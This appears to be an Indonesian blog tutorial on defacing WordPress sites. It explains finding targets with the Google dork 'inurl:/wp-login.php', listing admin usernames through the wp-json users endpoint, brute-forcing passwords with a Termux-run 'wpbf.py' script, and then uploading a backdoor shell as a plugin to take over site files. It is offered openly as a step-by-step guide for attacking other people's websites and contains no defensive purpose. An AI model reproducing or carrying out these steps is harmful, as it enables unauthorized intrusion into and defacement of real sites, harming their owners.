Deface Poc WordPress Brute Force ( WPBF )

Hallo ^_^ Kenalin Cuk Gw Renjazu ( Dika ) Kali Ini Gw Mau Kasih Tutorial Deface Poc WordPress Brute Force ( WPBF ) Buat Pemain Old Mesti Dah Tau Ya ? Buat Pemain Baru Yang Pengen Tau Simak Tutornya Ok

Bahan

-Shell Backdoor Here!
- Termux Here!
- List Password Here!
- Tools WPBF Here!

Mencari Target

Seperti Tutorial Deface Biasanya Yang Pertama Ya Kudu Nyari Target :v Buat Nyari Target nya Kalian Bisa Pake Google Dork Di Bawah Ini :
inurl:/wp-login.php
Note : Kembangin Lagi Pake Otak Klean Ya

Eksekusi

Yang Pertama Itu Kalian Perlu Mencari Tau Username Nya Terlebih Dahulu Cek Username ? site.com/wp-json/wp/v2/users
Nah Disitu Terlihat Bahwa Usernamenya Adalah [ admin ]

Buka Termux

- apt update && apt upgrade 
- termux-setup-storage
- cd /sdcard
- apt install python2
- python2 wpbf.py - h [ target kalian ] -u [ username wordpress ] -P [ list password ] -v
Habis Itu Kalian Tungguin Deh
Kalau Udah Dapet U/P Nya Tinggal Login Deh ^_^ Kalo Gadapet Faktor Muka Juga Penyebabnya

Upload Shell


Kalian Pencet Garis 3 Lurus Di Pojok Kiri Atas

Setelah Itu Klik Tanda Colokan Kabel :v Add New
Lalu Upload Shell Backdoor Yang Tadi Kalian Download Lalu Klik Install Plugins
Dan Klik Aktifkan Plugins Akses Shell ? site.com/?loadme
Dan Taraaa Shellnya Ke Upload Dan Kalian Bisa Delete,Rename,Etc,Chmod Asal Writable ^_^

Akhir Kata

Moga Ngerti See U Renjazu ~
Lebih baru Lebih lama